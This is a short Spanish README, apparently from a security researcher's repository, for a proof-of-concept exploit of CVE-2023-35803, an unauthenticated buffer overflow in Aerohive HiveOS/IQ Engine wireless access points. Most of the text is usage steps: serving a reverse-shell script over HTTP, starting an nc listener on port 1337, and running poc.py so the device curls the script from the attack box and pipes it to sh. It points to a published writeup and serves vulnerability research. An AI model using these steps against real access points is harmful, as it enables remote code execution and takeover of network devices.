
Exploit PoC para el desbordamiento de búfer no autenticado CVE-2023-35803 en Aerohive HiveOS/Extreme Networks IQ Engine, que permite la ejecución remota de código en puntos de acceso inalámbricos basados en ARM.
PoC para puntos de acceso basados en ARM que ejecutan HiveOS/IQ Engine <10.6r2.
revshell para que apunte a la IP/puerto de tu catcher de shellspython3 -m http.servernc -lvnp 1337python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"Writeup aquí: https://research.aurainfosec.io/pentest/bee-yond-capacity/
